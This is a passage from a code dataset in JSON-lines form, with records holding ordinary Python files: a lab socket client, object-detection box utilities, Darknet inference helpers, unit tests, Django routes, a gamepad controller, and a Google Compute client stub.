sock.recv(1024)\nsock.send(\"READY\".encode(\"UTF-8\"))\ntotalBytes = int.from_bytes(sock.recv(1024), byteorder='big', signed=False)\nsock.send(\"OK\".encode(\"UTF-8\"))\nf = open(\"test.txt\", \"wb\")\nbytesLeft = totalBytes\n\nlog(\"receiving\")\n\n# An artificial delay, so we can see the effect of having multiple clients\n# actually waiting in the server's queue.\ntime.sleep(delay)\nwhile(bytesLeft > 0):\n\tdata = sock.recv(min(1024, bytesLeft))\n\tbytesLeft -= len(data)\n\tf.write(data)\nf.close()\ndone = sock.recv(1024)\n\nlog(\"DONE\")\n\nsock.close()\n\t\n","sub_path":"Lab_4/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"373713489","text":"import json\nimport os\nimport torch\nimport random\nimport numpy as np\nimport xml.etree.ElementTree as ET\nimport torchvision.transforms.functional as FT\nfrom torchvision import transforms\nfrom PIL import Image\nimport cv2\n\n\n\n# SINGAPORE_od labels and color setting (Bus)\n########################################################################################################################\n# Label map\nElan_od_singapore_rev_label_map={}\nElan_od_singapore_labels = ('b', 't', 'm', 'k', 'c')\nElan_od_singapore_label_map = {k: v + 1 for v, k in enumerate(Elan_od_singapore_labels)}\nElan_od_singapore_label_map['background'] = 0\nElan_od_singapore_rev_label_map = {v: k for k, v in Elan_od_singapore_label_map.items()} # Inverse mapping\n\n# Color map for bounding boxes of detected objects from https://sashat.me/2017/01/11/list-of-20-simple-distinct-colors/\nElan_od_singapore_distinct_colors = ['#e6194b', '#3cb44b', '#ffe119', '#0082c8', '#f58231', '#008080']\nElan_od_singapore_label_color_map = {k: Elan_od_singapore_distinct_colors[i] for i, k in enumerate(Elan_od_singapore_label_map.keys())}\n########################################################################################################################\n\n\ndef parse_annotation_SINGAPORE_od(annotation_path, label_map):\n \n bboxes = fun_json2ObjLoc(annotation_path)\n \n boxes = list()\n labels = list()\n difficulties = list()\n # difficulties = [0]*len(bboxes)\n \n for box in bboxes:\n\n # difficult = int(object.find('difficult').text == '1')\n difficult = int(0)\n\n label = box['label']\n if len(label) > 1:\n label = str(label[0])\n if label not in label_map:\n print('False Label Image: {}'.format(annotation_path))\n print(box['label'])\n continue\n box_pp = box['points']\n\n boxes.append(box_pp)\n labels.append(label_map[label])\n difficulties.append(difficult)\n return {'boxes': boxes, 'labels': labels, 'difficulties': difficulties}\n\n\ndef fun_json2ObjLoc(json_filepath):\n with open(json_filepath, 'r') as f:\n data = json.load(f) \n bboxes=[]\n for shape in data['shapes']:\n if shape['shape_type']=='rectangle':\n label = shape['label']\n points = shape['points']\n box={}\n box['label']=label\n x_min = min(points[0][0], points[1][0])\n y_min = min(points[0][1], points[1][1])\n x_max = max(points[0][0], points[1][0])\n y_max = max(points[0][1], points[1][1])\n box['points']=[x_min,y_min,x_max, y_max]\n bboxes.append(box)\n return bboxes\n\ndef create_data_lists_SINGAPORE_od(train_path, test_path, output_folder, flag_apply= 'Day'):\n \"\"\"\n Create lists of images, the bounding boxes and labels of the objects in these images, and save these to file.\n\n :param train_path: path to the 'train.txt' folder\n :param test_path: path to the 'test.txt' folder\n :param output_folder: folder where the JSONs must be saved\n \"\"\"\n\n label_map = Elan_od_singapore_label_map\n # if flag_apply == 'Day':\n # label_map = Elan_od_CVAT_Day_label_map\n # if flag_apply == 'Night':\n # label_map = Elan_od_CVAT_Night_label_map\n\n if not os.path.exists(output_folder):\n os.makedirs(output_folder)\n\n if isinstance(train_path, str):\n train_path = [os.path.abspath(train_path)]\n elif isinstance(train_path, list):\n train_path = [os.path.abspath(x) for x in train_path]\n\n if isinstance(test_path, str):\n test_path = [os.path.abspath(test_path)]\n elif isinstance(test_path, list):\n test_path = [os.path.abspath(x) for x in test_path]\n \n print(train_path)\n print(test_path)\n\n train_images = list()\n train_objects = list()\n n_objects = 0\n\n # Training data\n for path in train_path:\n\n # Find IDs of images in training data\n with open(path) as f:\n ids = f.read().splitlines()\n\n for id in ids:\n id = id.split(\",\")\n train_img = id[0].strip()\n train_label = id[1].strip()\n # print(train_img)\n # print(train_label)\n \n # Parse annotation's XML file\n objects = parse_annotation_SINGAPORE_od(train_label, label_map)\n \n if len(objects['boxes']) == 0:\n continue\n n_objects += len(objects['boxes'])\n train_images.append(train_img)\n train_objects.append(objects)\n\n assert len(train_objects) == len(train_images)\n\n # Save to file\n with open(os.path.join(output_folder, 'TRAIN_images.json'), 'w') as j:\n json.dump(train_images, j)\n with open(os.path.join(output_folder, 'TRAIN_objects.json'), 'w') as j:\n json.dump(train_objects, j)\n with open(os.path.join(output_folder, 'label_map.json'), 'w') as j:\n json.dump(label_map, j) # save label map too\n\n print('\\nThere are %d training images containing a total of %d objects. Files have been saved to %s.' % (\n len(train_images), n_objects, os.path.abspath(output_folder)))\n\n # # Validation data\n # test_images = list()\n # test_objects = list()\n # n_objects = 0\n\n # for path in test_path:\n # # Find IDs of images in validation data\n # with open(path) as f:\n # ids = f.read().splitlines()\n\n # for id in ids:\n # id = id.split(\",\")\n # test_img = id[0].strip()\n # test_label = id[1].strip()\n\n # # Parse annotation's XML file\n # objects = parse_annotation_Elan_od(test_label,label_map)\n # if len(objects['boxes']) == 0:\n # continue\n # n_objects += len(objects['boxes'])\n # test_images.append(test_img)\n # test_objects.append(objects)\n\n # assert len(test_objects) == len(test_images)\n\n # # Save to file\n # with open(os.path.join(output_folder, 'TEST_images.json'), 'w') as j:\n # json.dump(test_images, j)\n # with open(os.path.join(output_folder, 'TEST_objects.json'), 'w') as j:\n # json.dump(test_objects, j)\n\n # print('\\nThere are %d validation images containing a total of %d objects. Files have been saved to %s.' % (\n # len(test_images), n_objects, os.path.abspath(output_folder)))\n\n\t\ndef decimate(tensor, m):\n \"\"\"\n Decimate a tensor by a factor 'm', i.e. downsample by keeping every 'm'th value.\n\n This is used when we convert FC layers to equivalent Convolutional layers, BUT of a smaller size.\n\n :param tensor: tensor to be decimated\n :param m: list of decimation factors for each dimension of the tensor; None if not to be decimated along a dimension\n :return: decimated tensor\n \"\"\"\n assert tensor.dim() == len(m)\n for d in range(tensor.dim()):\n if m[d] is not None:\n tensor = tensor.index_select(dim=d,\n index=torch.arange(start=0, end=tensor.size(d), step=m[d]).long())\n\n return tensor\n\n\n\ndef xy_to_cxcy(xy):\n \"\"\"\n Convert bounding boxes from boundary coordinates (x_min, y_min, x_max, y_max) to center-size coordinates (c_x, c_y, w, h).\n\n :param xy: bounding boxes in boundary coordinates, a tensor of size (n_boxes, 4)\n :return: bounding boxes in center-size coordinates, a tensor of size (n_boxes, 4)\n \"\"\"\n return torch.cat([(xy[:, 2:] + xy[:, :2]) / 2, # c_x, c_y\n xy[:, 2:] - xy[:, :2]], 1) # w, h\n\n\ndef cxcy_to_xy(cxcy):\n \"\"\"\n Convert bounding boxes from center-size coordinates (c_x, c_y, w, h) to boundary coordinates (x_min, y_min, x_max, y_max).\n\n :param cxcy: bounding boxes in center-size coordinates, a tensor of size (n_boxes, 4)\n :return: bounding boxes in boundary coordinates, a tensor of size (n_boxes, 4)\n \"\"\"\n return torch.cat([cxcy[:, :2] - (cxcy[:, 2:] / 2), # x_min, y_min\n cxcy[:, :2] + (cxcy[:, 2:] / 2)], 1) # x_max, y_max\n\n\ndef cxcy_to_gcxgcy(cxcy, priors_cxcy):\n \"\"\"\n Encode bounding boxes (that are in center-size form) w.r.t. the corresponding prior boxes (that are in center-size form).\n\n For the center coordinates, find the offset with respect to the prior box, and scale by the size of the prior box.\n For the size coordinates, scale by the size of the prior box, and convert to the log-space.\n\n In the model, we are predicting bounding box coordinates in this encoded form.\n\n :param cxcy: bounding boxes in center-size coordinates, a tensor of size (n_priors, 4)\n :param priors_cxcy: prior boxes with respect to which the encoding must be performed, a tensor of size (n_priors, 4)\n :return: encoded bounding boxes, a tensor of size (n_priors, 4)\n \"\"\"\n\n # The 10 and 5 below are referred to as 'variances' in the original Caffe repo, completely empirical\n # They are for some sort of numerical conditioning, for 'scaling the localization gradient'\n # See https://github.com/weiliu89/caffe/issues/155\n return torch.cat([(cxcy[:, :2] - priors_cxcy[:, :2]) / (priors_cxcy[:, 2:] / 10), # g_c_x, g_c_y\n torch.log(cxcy[:, 2:] / priors_cxcy[:, 2:]) * 5], 1) # g_w, g_h\n\n\ndef gcxgcy_to_cxcy(gcxgcy, priors_cxcy):\n \"\"\"\n Decode bounding box coordinates predicted by the model, since they are encoded in the form mentioned above.\n\n They are decoded into center-size coordinates.\n\n This is the inverse of the function above.\n\n :param gcxgcy: encoded bounding boxes, i.e. output of the model, a tensor of size (n_priors, 4)\n :param priors_cxcy: prior boxes with respect to which the encoding is defined, a tensor of size (n_priors, 4)\n :return: decoded bounding boxes in center-size form, a tensor of size (n_priors, 4)\n \"\"\"\n\n return torch.cat([gcxgcy[:, :2] * priors_cxcy[:, 2:] / 10 + priors_cxcy[:, :2], # c_x, c_y\n torch.exp(gcxgcy[:, 2:] / 5) * priors_cxcy[:, 2:]], 1) # w, h\n\n\ndef find_intersection(set_1, set_2):\n \"\"\"\n Find the intersection of every box combination between two sets of boxes that are in boundary coordinates.\n\n :param set_1: set 1, a tensor of dimensions (n1, 4)\n :param set_2: set 2, a tensor of dimensions (n2, 4)\n :return: intersection of each of the boxes in set 1 with respect to each of the boxes in set 2, a tensor of dimensions (n1, n2)\n \"\"\"\n\n # PyTorch auto-broadcasts singleton dimensions\n lower_bounds = torch.max(set_1[:, :2].unsqueeze(1), set_2[:, :2].unsqueeze(0)) # (n1, n2, 2)\n upper_bounds = torch.min(set_1[:, 2:].unsqueeze(1), set_2[:, 2:].unsqueeze(0)) # (n1, n2, 2)\n intersection_dims = torch.clamp(upper_bounds - lower_bounds, min=0) # (n1, n2, 2)\n return intersection_dims[:, :, 0] * intersection_dims[:, :, 1] # (n1, n2)\n\n\ndef find_jaccard_overlap(set_1, set_2):\n \"\"\"\n Find the Jaccard Overlap (IoU) of every box combination between two sets of boxes that are in boundary coordinates.\n\n :param set_1: set 1, a tensor of dimensions (n1, 4)\n :param set_2: set 2, a tensor of dimensions (n2, 4)\n :return: Jaccard Overlap of each of the boxes in set 1 with respect to each of the boxes in set 2, a tensor of dimensions (n1, n2)\n \"\"\"\n\n # Find intersections\n intersection = find_intersection(set_1, set_2) # (n1, n2)\n\n # Find areas of each box in both sets\n areas_set_1 = (set_1[:, 2] - set_1[:, 0]) * (set_1[:, 3] - set_1[:, 1]) # (n1)\n areas_set_2 = (set_2[:, 2] - set_2[:, 0]) * (set_2[:, 3] - set_2[:, 1]) # (n2)\n\n # Find the union\n # PyTorch auto-broadcasts singleton dimensions\n union = areas_set_1.unsqueeze(1) + areas_set_2.unsqueeze(0) - intersection # (n1, n2)\n\n # #box iou\n # output = intersection/ areas_set_2\n\n return intersection / union # (n1, n2)\n\n\n\ndef load_best_checkpoint(model, save_path):\n \"\"\"\n Load the best model checkpoint.\n\n :param model: model\n :param save_path: the path the saved the best model checkpoint\n \"\"\"\n filename = 'checkpoint.pth.tar'\n checkpoint = torch.load(os.path.join(save_path, 'BEST_' + filename))\n best_model = checkpoint['model']\n model.load_state_dict(best_model.state_dict())\n print(\"loaded the model weight from {}\".format(os.path.join(save_path, 'BEST_' + filename)))\n","sub_path":"OnlineInference/src/utils_car.py","file_name":"utils_car.py","file_ext":"py","file_size_in_byte":12242,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"45523855","text":"import unittest\n\nimport torch\n\nfrom fastNLP.modules.other_modules import GroupNorm, LayerNormalization, BiLinear\n\n\nclass TestGroupNorm(unittest.TestCase):\n def test_case_1(self):\n gn = GroupNorm(num_features=1, num_groups=10, eps=1.5e-5)\n x = torch.randn((20, 50, 10))\n y = gn(x)\n\n\nclass TestLayerNormalization(unittest.TestCase):\n def test_case_1(self):\n ln = LayerNormalization(d_hid=5, eps=2e-3)\n x = torch.randn((20, 50, 5))\n y = ln(x)\n\n\nclass TestBiLinear(unittest.TestCase):\n def test_case_1(self):\n bl = BiLinear(n_left=5, n_right=5, n_out=10, bias=True)\n x_left = torch.randn((7, 10, 20, 5))\n x_right = torch.randn((7, 10, 20, 5))\n y = bl(x_left, x_right)\n print(bl)\n bl2 = BiLinear(n_left=15, n_right=15, n_out=10, bias=True)\n","sub_path":"test/modules/test_other_modules.py","file_name":"test_other_modules.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"252806517","text":"# Copyright 2014 Google Inc. All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Add Plaso timeline to timesketch\"\"\"\n\nimport os\nimport sys\n\nfrom pyelasticsearch import ElasticSearch\n\n\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"timesketch.settings\")\nfrom django.contrib.auth.models import User\n\nfrom timesketch.apps.sketch.models import Timeline\n\n\nuser = User.objects.get(id=2)\nes_server = sys.argv[1]\nes_port = sys.argv[2]\nname = sys.argv[3]\nindex = sys.argv[4]\n\nes = ElasticSearch(\"http://%s:%s\" % (es_server, es_port))\n\nmapping = {\n \"plaso_event\": {\n u'properties': {\n u'timesketch_label': {\n \"type\": \"nested\"}\n }\n },\n}\n\nes.put_mapping(index, \"plaso_event\", mapping)\ntimeline = Timeline.objects.create(owner=user, title=name, description=name,\n datastore_index=index)\ntimeline.make_public()\n","sub_path":"utils/add_plaso_timeline.py","file_name":"add_plaso_timeline.py","file_ext":"py","file_size_in_byte":1421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"97228998","text":"from __future__ import division\n\nfrom models.darknet_model import Darknet\nfrom utils.common_util import load_classes, non_max_suppression, rescale_boxes, pad_to_square, resize, create_directory\nfrom PIL import Image\nfrom utils.visulize_util import plot_one_box, get_color_table\nimport torchvision.transforms as transforms\nfrom torch.autograd import Variable\n\nimport os\nimport time\nimport argparse\nimport cv2\nimport torch\nimport cfg\nimport numpy as np\n\ndef darknet_inference_write_results(img_dirs, model_dir, INPUTSIZE, classes, conf_th = 0.3, via_flag = True, save_flag = True, save_dir = './', cfg_file='./models/yolov3.cfg'):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = Darknet(cfg_file, img_size=INPUTSIZE).to(device)\n if model_dir.endswith(\".weights\"):\n model.load_darknet_weights(model_dir)\n else:\n model.load_state_dict(torch.load(model_dir))\n model.eval()\n file_list = os.listdir(img_dirs)\n color_table = get_color_table(80)\n for img_name in file_list:\n txt_name = img_name.split('.')[0]\n img_paths = os.path.join(img_dirs, img_name)\n assert create_directory(cfg.single_img_result_dir)\n txt_file = open(cfg.single_img_result_dir + txt_name, 'w')\n img_ori = cv2.imread(img_paths)\n img = transforms.ToTensor()(Image.open(img_paths))\n img, _ = pad_to_square(img, 0)\n input_imgs = resize(img, INPUTSIZE)\n input_imgs = Variable(torch.unsqueeze(input_imgs, dim=0).float(), requires_grad=False).cuda()\n with torch.no_grad():\n detections = model(input_imgs)\n detections = non_max_suppression(detections, conf_th, cfg.darknet_nms_th)\n if detections[0] is not None:\n detections = rescale_boxes(detections[0], INPUTSIZE, img_ori.shape[:2])\n for i, (x0, y0, x1, y1, conf, cls_conf, label) in enumerate(detections.numpy()):\n score = cls_conf*conf\n if score >= conf_th:\n src = classes[int(label)] + \" \" + str(round(score, 2)) + \" \" + str(int(x0)) + \" \" + str(int(y0)) + \" \" + str(int(x1)) + \" \" + str(int(y1))\n if i != len(detections) - 1:\n src += '\\n'\n txt_file.write(src)\n plot_one_box(img_ori, [x0, y0, x1, y1], label=classes[int(label)] + ', {:.2f}%'.format(score * 100),\n color=color_table[int(label)])\n if via_flag == True:\n cv2.namedWindow('Detection result', 0)\n cv2.resizeWindow('Detection result', 800, 800)\n cv2.imshow('Detection result', img_ori)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n if save_flag == True:\n cv2.imwrite(save_dir + img_name, img_ori)\n else:\n print(\"current img detect no obj \")\n print(\"img name is\", img_name)\n return 1\n\ndef darknet_model_init(model_dir, INPUTSIZE, cfg_file):\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n model = Darknet(cfg_file, img_size=INPUTSIZE).to(device)\n if model_dir.endswith(\".weights\"):\n model.load_darknet_weights(model_dir)\n else:\n model.load_state_dict(torch.load(model_dir))\n model.eval()\n return model\n\ndef darknet_inference_single_img(model, img_dir, INPUTSIZE, classes, conf_th = 0.3, via_flag = True):\n color_table = get_color_table(80)\n img_ori = cv2.imread(img_dir)\n img = transforms.ToTensor()(Image.open(img_dir))\n img, _ = pad_to_square(img, 0)\n input_imgs = resize(img, INPUTSIZE)\n input_imgs = Variable(torch.unsqueeze(input_imgs, dim=0).float(), requires_grad=False).cuda()\n with torch.no_grad():\n results = []\n detections = model(input_imgs)\n detections = non_max_suppression(detections, conf_th, cfg.darknet_nms_th)\n if detections[0] is not None:\n detections = rescale_boxes(detections[0], INPUTSIZE, img_ori.shape[:2])\n for i, (x0, y0, x1, y1, conf, cls_conf, label) in enumerate(detections.numpy()):\n score = cls_conf * conf\n if score >= conf_th:\n results.append( np.array( [x0, y0, x1, y1, score, label] ) )\n plot_one_box(img_ori, [x0, y0, x1, y1],\n label=classes[int(label)] + ', {:.2f}%'.format(score * 100),\n color=color_table[int(label)])\n if via_flag == True:\n cv2.namedWindow('Detection result', 0)\n cv2.resizeWindow('Detection result', 800, 800)\n cv2.imshow('Detection result', img_ori)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n else:\n print(\"current img detect no obj \")\n print(\"img name is\", img_dir)\n return results\n\nif __name__ == \"__main__\":\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n # darknet_inference_write_results(cfg.img_dir, cfg.darknet_weights, cfg.img_size[0], cfg.names_class, cfg.score_th, cfg.darknet_via_flag, cfg.darknet_save_flag, cfg.darknet_write_img_dir, cfg.darknet_cfg_file)\n model = darknet_model_init(cfg.darknet_weights, 416, cfg.darknet_cfg_file)\n results = darknet_inference_single_img(model, \"/home/pcl/tf_work/map/data/image_shandong/val00002.jpg\", 416, cfg.names_class, cfg.score_th, cfg.darknet_via_flag)\n print(results)","sub_path":"utils/dark_util.py","file_name":"dark_util.py","file_ext":"py","file_size_in_byte":5523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"570394567","text":"from django.conf.urls import url \nfrom django.contrib import admin \n\nfrom . import views \n#from django.contrib.auth import login\n\nfrom django.contrib.auth.views import login\n\napp_name = 'mysessions'\n\nurlpatterns= [\n\turl(r'^$', views.index, name ='index'),\n#make href = to the google id of the place; when place clicked, i\n#nstead of defailsview, use something similar to addalbum\n\t#url(r'^(?P[0-9]+)/$', views.DetailView.as_view(), name='detail'),\n\turl(r'^(?P[0-9]+)/$', views.session, name='session'),\n\turl(r'^(?P[0-9]+)/add/$', views.addPlace, name='addPlace'),\n\turl(r'^(?P[0-9]+)/down/$', views.downvote, name='downVote'),\n\turl(r'^(?P[0-9]+)/up/$', views.upvote, name='upVote'),\n\turl(r'^(?P[0-9]+)/getSelectedList/$', views.getSelectedPlaces, name='getPlaces'),\n\turl(r'^(?P[0-9]+)/getWinner/$', views.getWinner, name='getWinner'),\n\n\n#\turl(r'^login/$', views.login_view)\n\n\t#url(r'^login/$', login, {'template_name': 'mysessions/login.html'})\n\n\t#url(r'^(?P[0-9]+)/vote(?P(?:up|down))/$', views.vote, name='votePlace')\n\n]","sub_path":"mysessions/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"573942847","text":"#https://inputs.readthedocs.io/en/latest/user/quickstart.html\nfrom inputs import devices, get_gamepad\nfrom math import pi, cos\n\nfrom _thread import *\nimport threading\n\n#Button codes for a logitech gamepad\n#Trigger buttons: BTN_TL, BTN_TR, ABS_Z, ABS_RZ\n#Gamepad buttons: BTN_WEST, BTN_NORTH, BTN_SOUTH, BTN_EAST\n#Select/start \t: BTN_SELECT, BTN_START\n#Joy Pad \t\t: ABS_HAT0X, ABS_HAT0Y\n#Joysticks\t\t: ABS_X, ABS_Y, ABS_RX, ABS_RY\n\nclass joy_device():\n\tdef __init__(self, device):\n\t\tself.joystick_max_val = 32767\n\t\tself.speed_limit = 10\n\t\tself.deadzone = 10\n\t\tself.gamepad_queue = []\n\t\tself.device_id = device.manager\n\t\tself.gamepad_thread = None\n\t\tself.gamepad_thread_active = False\n\n\tdef queue_gamepad_input(self):\n\t\twhile self.gamepad_thread_active:\n\t\t\tnew_input = self.get_gamepad_input()\n\t\t\tfor item in new_input:\n\t\t\t\tself.gamepad_queue.append(item)\n\t\telse:\n\t\t\tprint(\"gamepad thread stopped\")\n\n\tdef get_gamepad_input(self):\n\t\tlist_events = []\n\t\tevents = get_gamepad()\n\t\tfor event in events:\n\t\t\tif event.device.manager == self.device_id:\n\t\t\t\tlist_events.append({\"event\":event.code,\"value\":event.state})\n\t\treturn list_events\n\n\tdef start_gamepad_thread(self):\n\t\tself.gamepad_thread_active = True\n\t\tself.gamepad_thread = threading.Thread(target=self.queue_gamepad_input)\n\t\tself.gamepad_thread.daemon = True\n\t\tself.gamepad_thread.start()\n\n\tdef stop_gamepad_thread(self):\n\t\tself.gamepad_thread_active = False\n\t\tself.gamepad_thread = None\n\n\tdef pop_gamepad_queue(self):\n\t\tlocal_queue = self.gamepad_queue\n\t\tself.gamepad_queue = []\n\t\treturn local_queue\n\n\tdef normalize_joy(self, val):\n\t #NewValue = (((OldValue - OldMin) * (NewMax - NewMin)) / (OldMax - OldMin)) + NewMin\n\t newval = (((val+self.joystick_max_val)*(self.speed_limit*2))/(2*self.joystick_max_val))-self.speed_limit\n\t #print(newval)\n\t if -2 < newval < 2:\n\t return 0\n\t else:\n\t return newval\n\n\t#https://home.kendra.com/mauser/joystick.html\n\n\tdef mix_joy(self, xval, yval):\n\t newx = (((xval+self.joystick_max_val)*(100*2))/(2*self.joystick_max_val))-100\n\t newy = (((yval+self.joystick_max_val)*(100*2))/(2*self.joystick_max_val))-100\n\n\t if -self.deadzone < newx < self.deadzone:\n\t newx = 0\n\t if -self.deadzone < newy < self.deadzone:\n\t newy = 0\n\n\t newx = -1 * newx\n\t V = (100-abs(newx))*(newy/100)+newy\n\t W = (100-abs(newy))*(newx/100)+newx\n\t left = ((V-W)/2)/100\n\t right = ((V+W)/2)/100\n\t #print(f'l: {left} ||| r: {right}')\n\t left = self.speed_limit * left\n\t right = self.speed_limit * right #((newy*limit)/100)\n\n\t return left, right\n\n\tdef stop_thread(self):\n\t\tself.gamepad_thread_active = False","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":2633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"117100995","text":"#!/usr/bin/env python\nimport os\nimport shutil\nfrom dataclasses import asdict\nfrom pathlib import Path\n\nimport pytest\n\nimport colrev.env.utils\nimport colrev.review_manager\nimport colrev.settings\n\n# Note : the following produces different relative paths locally/on github.\n# Path(colrev.__file__).parents[1]\n\ntest_data_path = Path()\n\n\ndef retrieve_test_file(*, source: Path, target: Path) -> None:\n target.parent.mkdir(exist_ok=True, parents=True)\n shutil.copy(\n test_data_path / source,\n target,\n )\n\n\n# @pytest.fixture(scope=\"module\")\n@pytest.fixture\ndef review_manager(session_mocker, tmp_path: Path, request) -> colrev.review_manager.ReviewManager: # type: ignore\n global test_data_path\n test_data_path = Path(request.fspath).parents[1] / Path(\"data\")\n\n session_mocker.patch(\n \"colrev.env.environment_manager.EnvironmentManager.get_name_mail_from_git\",\n return_value=(\"Tester Name\", \"tester@email.de\"),\n )\n\n session_mocker.patch(\n \"colrev.env.environment_manager.EnvironmentManager.register_repo\",\n return_value=(),\n )\n\n # test_repo_dir = tmp_path_factory.mktemp(\"test_review_example\") # type: ignore\n test_repo_dir = tmp_path\n os.chdir(test_repo_dir)\n print(test_repo_dir)\n\n review_manager = colrev.review_manager.ReviewManager(\n path_str=str(test_repo_dir), force_mode=True\n )\n review_manager.settings = colrev.settings.load_settings(\n settings_path=test_data_path.parents[1]\n / Path(\"colrev/template/init/settings.json\")\n )\n\n review_manager.settings.project.title = \"topic a - a review\"\n review_manager.get_init_operation(\n review_type=\"literature_review\",\n example=False,\n target_path=test_repo_dir,\n light=True,\n )\n\n # Note: the strategy is to test the workflow and the endpoints separately\n # We therefore deactivate the (most time consuming endpoints) in the following\n review_manager = colrev.review_manager.ReviewManager(\n path_str=str(review_manager.path)\n )\n\n # review_manager.dataset.add_changes(path=Path(\"data/search/test_records.bib\"))\n review_manager.settings.prep.prep_rounds[0].prep_package_endpoints = [\n {\"endpoint\": \"colrev_built_in.source_specific_prep\"},\n ]\n review_manager.settings.sources = []\n\n review_manager.save_settings()\n return review_manager\n\n\n# To create new test datasets, it is sufficient to\n# create the source_filepath and an empty expected_file\n# running the test will update the expected_file\n@pytest.mark.parametrize(\n \"source_filepath, expected_source_identifier, expected_file\",\n [\n (Path(\"ais.txt\"), \"colrev_built_in.ais_library\", Path(\"ais_result.bib\")),\n (Path(\"pubmed.csv\"), \"colrev_built_in.pubmed\", Path(\"pubmed_result.bib\")),\n (Path(\"dblp.bib\"), \"colrev_built_in.dblp\", Path(\"dblp_result.bib\")),\n ],\n)\ndef test_source(\n source_filepath: Path,\n expected_source_identifier: str,\n expected_file: Path,\n review_manager: colrev.review_manager.ReviewManager,\n) -> None:\n retrieve_test_file(\n source=Path(\"built_in_search_sources/\") / source_filepath,\n target=Path(\"data/search/\") / source_filepath,\n )\n\n load_operation = review_manager.get_load_operation()\n new_sources = load_operation.get_new_sources(skip_query=True)\n load_operation.main(new_sources=new_sources)\n actual_source_identifier = review_manager.settings.sources[0].endpoint\n\n # This tests the heuristics\n assert expected_source_identifier == actual_source_identifier\n\n prep_operation = review_manager.get_prep_operation()\n prep_operation.main()\n\n # Test whether the load(fixes) and source-specific prep work as expected\n actual = Path(\"data/records.bib\").read_text()\n expected = (\n test_data_path / Path(\"built_in_search_sources/\") / expected_file\n ).read_text()\n\n # If mismatch: copy the actual file to replace the expected file (facilitating updates)\n if expected != actual:\n print(Path.cwd())\n shutil.copy(\n Path(\"data/records.bib\"),\n test_data_path / Path(\"built_in_search_sources/\") / expected_file,\n )\n\n assert expected == actual\n","sub_path":"tests/3_built_in/source_specific_load_prep_test.py","file_name":"source_specific_load_prep_test.py","file_ext":"py","file_size_in_byte":4199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"57399400","text":"# Copyright 2023 Google LLC. All Rights Reserved.\n# \n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n# \n# http://www.apache.org/licenses/LICENSE-2.0\n# \n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nfrom connector import channel\nfrom google3.cloud.graphite.mmv2.services.google.compute import (\n instance_group_manager_pb2,\n)\nfrom google3.cloud.graphite.mmv2.services.google.compute import (\n instance_group_manager_pb2_grpc,\n)\n\nfrom typing import List\n\n\nclass InstanceGroupManager(object):\n def __init__(\n self,\n id: int = None,\n creation_timestamp: str = None,\n name: str = None,\n description: str = None,\n zone: str = None,\n region: str = None,\n distribution_policy: dict = None,\n instance_template: str = None,\n versions: list = None,\n instance_group: str = None,\n target_pools: list = None,\n base_instance_name: str = None,\n fingerprint: str = None,\n current_actions: dict = None,\n status: dict = None,\n target_size: int = None,\n self_link: str = None,\n auto_healing_policies: list = None,\n update_policy: dict = None,\n named_ports: list = None,\n stateful_policy: dict = None,\n service_account: str = None,\n failover_action: str = None,\n project: str = None,\n location: str = None,\n service_account_file: str = \"\",\n ):\n channel.initialize()\n self.name = name\n self.description = description\n self.distribution_policy = distribution_policy\n self.instance_template = instance_template\n self.versions = versions\n self.target_pools = target_pools\n self.base_instance_name = base_instance_name\n self.target_size = target_size\n self.auto_healing_policies = auto_healing_policies\n self.update_policy = update_policy\n self.named_ports = named_ports\n self.stateful_policy = stateful_policy\n self.service_account = service_account\n self.failover_action = failover_action\n self.project = project\n self.location = location\n self.service_account_file = service_account_file\n\n def apply(self):\n stub = (\n instance_group_manager_pb2_grpc.ComputeBetaInstanceGroupManagerServiceStub(\n channel.Channel()\n )\n )\n request = (\n instance_group_manager_pb2.ApplyComputeBetaInstanceGroupManagerRequest()\n )\n if Primitive.to_proto(self.name):\n request.resource.name = Primitive.to_proto(self.name)\n\n if Primitive.to_proto(self.description):\n request.resource.description = Primitive.to_proto(self.description)\n\n if InstanceGroupManagerDistributionPolicy.to_proto(self.distribution_policy):\n request.resource.distribution_policy.CopyFrom(\n InstanceGroupManagerDistributionPolicy.to_proto(\n self.distribution_policy\n )\n )\n else:\n request.resource.ClearField(\"distribution_policy\")\n if Primitive.to_proto(self.instance_template):\n request.resource.instance_template = Primitive.to_proto(\n self.instance_template\n )\n\n if InstanceGroupManagerVersionsArray.to_proto(self.versions):\n request.resource.versions.extend(\n 